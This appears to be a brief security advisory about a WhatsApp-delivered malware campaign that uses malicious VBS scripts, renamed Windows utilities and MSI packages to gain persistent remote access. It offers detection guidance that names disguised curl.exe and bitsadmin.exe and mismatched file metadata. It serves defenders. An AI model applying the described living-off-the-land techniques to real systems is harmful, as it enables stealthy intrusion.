WhatsApp malware campaign uses malicious VBS files to gain persistent access
Summary
A new malware campaign is targeting WhatsApp users, distributing malicious Visual Basic Script (VBS) files that leverage social engineering and living-off-the-land (LOTL) techniques. These scripts aim to establish persistent access and remote control by deploying disguised versions of legitimate Windows utilities and malicious Microsoft Installer (MSI) packages.
IFF Assessment
This campaign is bad news for defenders because it uses social engineering, living-off-the-land techniques with legitimate tools, and trusted cloud infrastructure, making it stealthy and difficult to detect.
Defender Context
Defenders should be aware of this campaign's reliance on VBS files distributed via WhatsApp and the use of LOTL techniques. They should monitor for disguised Windows utilities like curl.exe and bitsadmin.exe, and look for metadata discrepancies where a file's name doesn't match its embedded OriginalFileName, as this is a key detection signal.